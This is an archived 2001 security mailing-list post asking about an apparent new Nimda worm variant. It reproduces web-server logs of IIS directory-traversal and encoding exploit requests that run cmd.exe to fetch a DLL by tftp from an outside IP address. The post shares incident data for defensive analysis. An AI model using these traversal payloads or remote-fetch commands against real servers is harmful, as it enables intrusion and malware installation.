NIMDA.E (new variant) http://www.sarc.com/avcenter/venc/data/w32.nimda.eat_private -----Original Message----- From: Aj Effin Reznor [mailto:ajat_private] Sent: Tuesday, October 30, 2001 1:20 AM To: incidentsat_private Subject: New Worm Variant? Anyone seen a new worm doing something like this? Checking back through my logs, I haven't had a NIMDA instance yet looking for httpodbc.dll . Caught my eye. Anyone else? (Yes, some produce a code 200 rather than 404, that's to be expected on this system). Log times are in PST [29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-" [29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-" [29/Oct/2001:17:08:44 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 384 "-" "-" [29/Oct/2001:17:08:52 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 436 "-" "-" [29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-" [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-" [29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\h ttpodbc.dll HTTP/1.0" 200 449 "-" "-" [29/Oct/2001:17:09:21 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\h ttpodbc.dll HTTP/1.0" 200 449 "-" "-" [29/Oct/2001:17:09:30 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\h ttpodbc.dll HTTP/1.0" 200 449 "-" "-" [29/Oct/2001:17:09:30 -0800] "GET /c/httpodbc.dll HTTP/1.0" 404 326 "-" "-" [29/Oct/2001:17:09:40 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-" [29/Oct/2001:17:09:52 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\h ttpodbc.dll HTTP/1.0" 200 449 "-" "-" [29/Oct/2001:17:10:01 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\h ttpodbc.dll HTTP/1.0" 200 449 "-" "-" [29/Oct/2001:17:10:11 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\h ttpodbc.dll HTTP/1.0" 200 449 "-" "-" [29/Oct/2001:17:10:11 -0800] "GET /d/httpodbc.dll HTTP/1.0" 404 326 "-" "-" [29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-" [29/Oct/2001:17:10:30 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2 0cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-" [29/Oct/2001:17:10:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2 0cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-" [29/Oct/2001:17:10:47 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2 0cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-" [29/Oct/2001:17:10:55 -0800] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 393 "-" "-" [29/Oct/2001:17:11:03 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-" [29/Oct/2001:17:11:12 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i% 2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-" [29/Oct/2001:17:11:21 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i% 2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-" [29/Oct/2001:17:11:30 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i% 2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-" [29/Oct/2001:17:11:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-" [29/Oct/2001:17:11:48 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-" [29/Oct/2001:17:11:57 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i% 2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-" [29/Oct/2001:17:12:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i% 2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-" [29/Oct/2001:17:12:15 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i% 2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-" [29/Oct/2001:17:12:24 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-" [29/Oct/2001:17:12:33 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-" [29/Oct/2001:17:12:43 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 514 "-" "-" [29/Oct/2001:17:12:55 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 514 "-" "-" [29/Oct/2001:17:13:04 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 514 "-" "-" [29/Oct/2001:17:13:13 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc .dll HTTP/1.0" 200 442 "-" "-" [29/Oct/2001:17:13:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-" [29/Oct/2001:17:13:33 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET% 20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-" [29/Oct/2001:17:13:42 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET% 20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-" [29/Oct/2001:17:13:51 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET% 20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-" [29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0" 200 394 "-" "-" [29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-" [29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-" [29/Oct/2001:17:14:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET% 20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-" [29/Oct/2001:17:14:28 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET% 20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-" [29/Oct/2001:17:14:37 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET% 20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-" [29/Oct/2001:17:14:45 -0800] "GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 200 394 "-" "-" [29/Oct/2001:17:14:53 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-" [29/Oct/2001:17:15:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET% 20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-" [29/Oct/2001:17:15:19 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET% 20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-" [29/Oct/2001:17:15:28 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET% 20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-" [29/Oct/2001:17:15:37 -0800] "GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0" 200 394 "-" "-" [29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-" [29/Oct/2001:17:15:38 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-" [29/Oct/2001:17:15:50 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 414 "-" "-" [29/Oct/2001:17:15:59 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20G ET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 469 "-" "-" [29/Oct/2001:17:16:08 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20G ET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 469 "-" "-" [29/Oct/2001:17:16:17 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20G ET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 469 "-" "-" [29/Oct/2001:17:16:26 -0800] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 397 "-" "-" [29/Oct/2001:17:16:37 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-" [29/Oct/2001:17:16:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2 0cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-" [29/Oct/2001:17:16:55 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2 0cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-" [29/Oct/2001:17:17:04 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2 0cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-" [29/Oct/2001:17:17:13 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0" 200 393 "-" "-" -aj. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 07:19:59 PST